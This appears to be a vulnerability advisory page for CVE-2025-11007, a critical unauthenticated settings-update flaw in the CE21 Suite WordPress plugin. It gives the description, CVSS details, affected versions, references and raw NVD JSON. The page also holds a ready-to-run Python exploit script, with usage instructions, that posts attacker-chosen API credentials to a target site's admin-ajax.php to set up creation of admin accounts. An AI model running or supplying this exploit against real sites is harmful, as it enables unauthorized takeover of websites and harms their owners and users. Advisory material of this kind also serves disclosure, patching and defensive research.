Security Vulnerability Report
CVE-2025-11007 CVSS 9.8 CRITICAL

Published: 2025-11-04 04:15:37
Last Modified: 2026-04-15 00:35:42

Description

The CE21 Suite plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the wp_ajax_nopriv_ce21_single_sign_on_save_api_settings AJAX action in versions 2.2.1 to 2.3.1. This makes it possible for unauthenticated attackers to update the plugin's API settings including a secret key used for authentication. This allows unauthenticated attackers to create new admin accounts on an affected site.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

CE21 Suite plugin 2.2.1
CE21 Suite plugin 2.2.2
CE21 Suite plugin 2.2.3
CE21 Suite plugin 2.3.0
CE21 Suite plugin 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-11007 PoC
# WordPress CE21 Suite Plugin Unauthorized API Settings Update
# Target: WordPress site with CE21 Suite plugin (versions 2.2.1 to 2.3.1)


def exploit(target_url, api_key='attacker-controlled-key'):
    """
    Exploit the missing capability check in CE21 Suite plugin
    Allows unauthenticated attackers to update API settings
    """
    # Target the AJAX endpoint
    ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'

    # Payload to update API settings
    # This allows attacker to set a malicious API key
    data = {
        'action': 'ce21_single_sign_on_save_api_settings',
        'ce21_api_key': api_key,
        'ce21_api_secret': 'attacker-secret',
        'ce21_enabled': '1'
    }

    try:
        print(f'[*] Target: {target_url}')
        print('[*] Exploiting CVE-2025-11007...')
        print(f'[*] Sending malicious request to {ajax_url}')
        response = requests.post(ajax_url, data=data, timeout=30)
        if response.status_code == 200:
            print('[+] Request sent successfully')
            print(f'[+] Response: {response.text}')
            print('[+] API settings may have been updated')
            print('[+] Attacker can now potentially create admin accounts')
        else:
            print(f'[-] Request failed with status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url> [api_key]')
        print(f'Example: python {sys.argv[0]} http://target.com malicious-api-key')
        sys.exit(1)
    target = sys.argv[1]
    key = sys.argv[2] if len(sys.argv) > 2 else 'attacker-controlled-key'
    exploit(target, key)

References

https://wordpress.org/plugins/ce21-suite/
https://www.wordfence.com/threat-intel/vulnerabilities/id/5e24feac-1812-45d7-b3c3-27787eed1cf1?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11007", "sourceIdentifier": "[email protected]", "published": "2025-11-04T04:15:36.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CE21 Suite plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the wp_ajax_nopriv_ce21_single_sign_on_save_api_settings AJAX action in versions 2.2.1 to 2.3.1. This makes it possible for unauthenticated attackers to update the plugin's API settings including a secret key used for authentication. This allows unauthenticated attackers to create new admin accounts on an affected site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://wordpress.org/plugins/ce21-suite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e24feac-1812-45d7-b3c3-27787eed1cf1?source=cve", "source": "[email protected]"}]}}